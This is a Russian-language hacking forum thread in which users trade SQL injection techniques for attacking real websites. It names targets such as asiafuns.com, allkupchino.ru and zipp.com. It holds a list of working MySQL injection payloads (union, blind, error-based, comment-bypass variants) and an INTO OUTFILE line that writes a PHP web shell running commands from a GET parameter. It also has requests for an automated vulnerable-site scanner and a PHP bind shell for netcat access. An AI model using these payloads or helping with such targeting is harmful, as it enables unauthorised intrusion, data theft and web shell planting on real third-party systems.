Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    http://www.asiafuns.com/search_results.php?country=163+and+substring%28SELECT%20version%28%29,1,1%29=5+--+

    select не фильтруется
     
  2. Derec

    Derec Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    74
    Likes Received:
    4
    Reputations:
    0
    Redwood, я понял. С шеллом не получилось. Но вот, что известно:
    Инъекция в числовом параметре есть:
    http://site.com/menu/show/121%20and%201=1/33/#main

    Результат:

    A Database Error Occurred

    Error Number: 1054

    Unknown column '20and' in 'where clause'

    SELECT * FROM menu WHERE id=121%20and%201=1​

    Фильтруются пробелы, символы : ( , ) , /**/, +

    Можно ли раскрутить скуль в таком случае? :confused:
     
  3. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    подзапросы + join
     
  4. Derec

    Derec Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    74
    Likes Received:
    4
    Reputations:
    0
    Это через программу? как бы я так понимаю я итак делаю post'om через браузер :confused:

    подзапросы не помогают, потому что фильтруются даже скобочки в самой url
     
  5. LBC

    LBC Banned

    Joined:
    10 Sep 2010
    Messages:
    49
    Likes Received:
    3
    Reputations:
    5
    что делать если union и select в связке фильтруются
     
    1 person likes this.
  6. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Подзапросы, крутить как слепую, вывод в ошибке

    Code:
    sql.php?id=2+union+(select+1,2,table_name,4,5+from+information_schema.tables)
    
    and etc

    Code:
    sql.php?id=2+and+(select+ascii(substring((select+table_name+from+information_schema.tables+limit+0,1),1,1))+from+information_schema.tables+limit+0,1)>66
    
    and etc

    Вывод через ошибку без использования Union

    Для Mysql 4.1>=

    Code:
    sql.php?id=2+and+(select+1+from+(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
    
    Code:
    sql.php?id=2+or+1+group+by+concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+having+min(0)
    
    Для Mysql 5.1>=

    Code:
    sql.php?id=2+and+extractvalue(1,concat(0x5c,((select+table_name+from+information_schema.tables+limit+0,1))))
    
    Для Mysql 5.0.12 > 5.0.64

    Code:
    sql.php?id=1+or+(1,2)=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),1),name_const((select+table_name+from+information_schema.tables+limit+0,1),1))a)
    

    Можно еще попробовать обойти так

    Code:
    sql.php?id=2+un/**/ion+se/**/lect+1,2,3,4,5
    
    Code:
    sql.php?id=2+un/*%00*/ion+se/*%00*/lect+1,2,3,4,5
    
    Code:
    sql.php?id=2/**/union/**/select/**/1,2,3,4,5
    
    Code:
    sql.php?id=2+union+%0A+select+1,2,3,4,5
    
    Вариантов куча, всего не перечислишь, думаю этого должно хватить :)
     
    #14926 h00lyshit!, 28 Sep 2010
    Last edited: 29 Sep 2010
    1 person likes this.
  7. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Кто знает софт(скрипт) который в гугл лезет по моему дорку, подставляет в URL ковычку и сайты где вышла ошибка передаёт мне?
     
  8. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    http://zalil.ru/29741714
     
    2 people like this.
  9. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    Нашел вот такую вещь
    Code:
    id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+encl osed+by+"<?php+system($_GET[c]);die();?>"--+
    Что-то я не пойму откуда берется шелл чтобы залить его в /path/to/ ?
     
  10. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    Так вот оно: "<?php+system($_GET[c]);die();?>"
    Можешь на свой код заменить...
     
    1 person likes this.
  11. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Привет подскажите плиз как оборвать запрос на данном сайте

    http://allkupchino.ru/miss/miss.phtml?n=46{SQL}
    http://allkupchino.ru/bbs/ob.phtml?nb=42{SQL}

    Если подставить (+; --+; /*) то результат не выводится, значит ошибка = (
     
  12. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    По моему там ваапще нет скули..
     
  13. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    Можно ли через sql inj внести изменения в колонку ДБ (допустим добавить/обновить юзера/хеш) ?
    Если это возможно приведите плз пример
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    Нет нельзя.Подумай сам если бы такое было возможно, то раздел рашифровки хешей был бы не нужен.А если по теме то почитай доки мускуля а в частности UNION+SELECT
    и UPDATE
     
    1 person likes this.
  15. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    PHP:
    UPDATE admin SET email='[email protected]WHERE user_name='admin'
    обновит емайл юзера под ником "admin" , вроде как. Но как подметил Gorev , чаще всего это невозможно... не хватает прав.
     
    1 person likes this.
  16. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    Читал доки , но как говорится надежда умирает последней )))

    Спс.
     
  17. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    очень прошу помочь найти админку тут zipp.com
     
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Это невозможно всегда, дело не в правах а в синтаксисе мускуля (если говорим про данный оператор в иньекции) UPDATE после UNION SELECT не работает.
     
    1 person likes this.
  19. Ericon2009

    Ericon2009 New Member

    Joined:
    11 Feb 2009
    Messages:
    27
    Likes Received:
    1
    Reputations:
    0
    подскажите скриптец аналог bind.pl, но на пхп,
    то есть цель - забиндить порт средствами пхп с целью туда неткатом подключиться
     
    #14939 Ericon2009, 30 Sep 2010
    Last edited: 30 Sep 2010
  20. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://zipp.com/media/
     
Thread Status:
Not open for further replies.